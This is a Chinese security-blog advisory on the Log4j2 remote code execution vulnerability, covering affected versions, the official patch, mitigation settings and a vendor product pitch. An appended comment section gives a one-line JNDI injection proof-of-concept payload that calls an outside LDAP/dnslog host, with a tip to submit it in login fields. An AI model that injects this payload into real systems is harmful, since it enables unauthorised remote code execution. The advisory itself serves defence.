微慑信息网

Log4j2 远程代码执行漏洞(附利用及临时修复办法)

// 边界无限漏洞风险提示

漏洞分析

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。

经边界无限安全攻防团队研判后,认定该漏洞影响范围极广,漏洞危害极大

防团队已经成功复现此漏洞

漏洞风险提示|Log4j2 远程代码执行漏洞

影响判断方式,用户只需排查Java应用是否引入 log4j-api log4j-core 两个jar。若存在应用使用,极大可能会受到影响。

影响范围

Apache log4j2 在 2.0 至 2.14.1 版本受影响。

解决方案

1. 官方补丁 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1

2. 靖云甲应用安全防护模块默认防御此漏洞。

3.解决方案:
log4j2.formatMsgNoLookups=True
紧急方案就第一 网络拦截,第二防止外联,第三吧功能关了

参考资料

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1

靖云甲·云原生安全防护系统

靖云甲应用安全防护模块,将主动防御能力无缝融合至应用程序运行环境和开发语言中。通过对请求调用的关键函数进监听,结合应用上下文情景分析能力和强大的攻击检测引擎,可捕捉并拦截各种绕过流量检测的威胁攻击,来应对无处不在的应用漏洞与网络威胁,从而为应用程序提供全生命周期的动态安全保护。

联系方式:

邮箱:[email protected]

联系电话:010-84351519

原文始发于微信公众号(边界无限):漏洞风险提示|Log4j2 远程代码执行漏洞

拓展阅读(点评/知识):

1.poc:

poc不知真假

在登录口用户名密码都登录打一下就知道了

${jndi:ldap://xxxxx.dnslog.cn/exp}

 

2.临时修复办法:

解决方案:
log4j2.formatMsgNoLookups=True
紧急方案就第一 网络拦截,第二防止外联,第三吧功能关了

本文标题:Log4j2 远程代码执行漏洞(附利用及临时修复办法)
本文链接:
(转载请附上本文链接)
https://vulsee.com/archives/vulsee_2021/1209_15817.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » Log4j2 远程代码执行漏洞(附利用及临时修复办法)
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们